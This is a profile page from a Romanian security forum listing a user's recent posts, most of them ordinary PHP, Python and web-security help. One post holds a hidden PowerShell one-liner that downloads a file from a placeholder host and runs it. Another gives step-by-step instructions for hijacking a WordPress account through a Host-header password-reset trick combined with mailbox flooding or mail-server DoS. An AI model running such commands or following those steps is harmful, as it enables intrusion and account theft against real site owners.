dancezar

Active Members
  • Content count

    915
  • Joined

  • Last visited

  • Days Won

    20

dancezar last won the day on June 18

dancezar had the most liked content!

Community Reputation

467 Excellent

2 Followers

About dancezar

  • Rank
    $VIP=1;
  • Birthday 01/18/96
  1. powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('http://example.com/exe.txt',\"cale\exe.exe\"); Start-Process \"cale\exe.exe\""
  2. Tu nu ai citit ce am scris, ti-am explicat pasii, daca ai nevoie de pasi cu 1,2,3 uite: 1) Iti trebuie emailul contului de WP 2) Iti trebuie un server de mail unde sa ai inregistrat acelasi cont ca acel al "victimei" , daca emailul contului de WP este info@domeniu.com, si tu trebuie sa ai info@domeniultau.com 3) Trimite foarte multe emailuri cu atasamente mari catre emalul victimei in asa fel in cat el sa nu mai aibe spatiu in quota si sa nu mai poata primii emailuri, sau fa DOS serverului de email. 4) Iti trebuie ip-ul real al serverului si sa fie singurul site de pe server, trimite un request de resetarea parole, dar schimbi headerul "Host" si bagi "Host: domeniultau.com" 5) Astepti sa vina emailul in casuta ta de email Nu sunt interesat, dar este cam mult de munca pentru 50e:))
  3. Cred ca numele este de vina, Romanian Security Team... Intr-adevar numele forumului induce in eroare ar trebuii sa fie Romanian Security mai putin in ultimul timp Team, sau Romanian Security unde? pentru ca 80% din posturi is despre conturi pe facebook si cateodata niste intrebari de programare, Team.
  4. Era smecherie daca se putea face asta, ce se poate controla prin vulnerabilitatea asta este "from" si "return-path" iar victima va primi mesajul cu headerele astea modificate. Apoi tu trebuie sa faci cumva ca serverul de mail sa nu poata primii acel mesaj, ca sa redirectioneze acel mesaj catre serveru tau de mail prin "return-path". Dupa cum ziceau autorii exploit-ului ,ce se poate face daca este vulnerabil la asta este sa faci DOS la serverul de smtp daca are setat sa foloseasca server de SMTP la trimis mailuri, sau sa umplii tot spatiul de stocare permis pentru primit emailuri.
  5. Nu cred ca te putem ajuta daca nu arati site-ul ala.
  6. Iti posteaza datele personale pe un forum, dar baiatul este ok in general. https://rstforums.com/forum/topic/100304-regulamentul-forumului/ "- Se interzice publicarea de continut ilegal sau fara drepturi de autor! Este interzisa publicarea de date cu caracter personal" Sa nu se inteleaga ca iau apararea celeilalte persoane care a mintit in legatura cu acel cont, dar nici el nu a gestionat situatia corect:). Pana la urma acel refund nu s-a intamplat si nu se intampla niciodata, pentru ca acel cont era in regula si pentru ca avea dovezi. Atunci acele date personale ce rost aveau sa fie postate?
  7. Amandoi merita:))
  8. >>> import json >>> a='{"test":"1","tes2":2}' >>> parsed=json.loads(a) >>> for p in parsed: ... print p ... print parsed[p] ... test 1 tes2 2 >>>
  9. Nu cred ca spatiul de stocare este o problema, este foarte ieftin. Daca vrei ca userul sa isi vada raport-ul peste timp, normal ca o sa trebuiasca stocate undeva fizic, ce intrebare e asta? Sau le mai stergi periodic cu un script in functie de data creeri, daca is mai vechi de o luna doua si asa mai departe.
  10. Doar executa comanda shell in background si redirectioneaza output-ul intr-un fisier, apoi poti sa afisezi output-ul din acel fisier in interfata web.
  11. Nu merge chiar asa:)) src este pentru incarcat resurse, iar pe IE-u ala vechi cand incerci sa incarci javascript prin orice resursa se va executa. Deci nu are sens ca in value sa se intample acelasi lucru. Iar in cazul tau nu se poate face nimic, chiar daca vei insera newline(%0a) se va duce pe randul urmator dar va face parte din acelasi atribut atata timp cat o ghilimea este in fata payload-ului si nu poti baga o alta ghilimea.
  12. http://stackoverflow.com/questions/2803772/turn-off-deprecated-errors-php-5-3
  13. Scrie in eroare ce trebuie sa faci, ori te duci la o versiune mai veche de PHP, ori rescrii aplicatia folosind PDO sau mysqli in loc de mysql_*(asta daca aplicatia nu merge deloc, daca merge poti ignora eroarea). In principiu nimic ce tine de partea de functionalitate, daca foloseste PDO sau mysqli query-urile vor fi mai rapide si plus de asta dispun de prepared query pentru a evita mai eficient sql injection.
  14. Patch-ul pentru problema aia a fost lansat acum aproape doua luni, timp suficient pentru companii sa il aplice.
  15. Se numeste httponly si nu, phpsessid nu este httponly by default si se poate citi prin javascript, daca ai un XSS este indeajuns.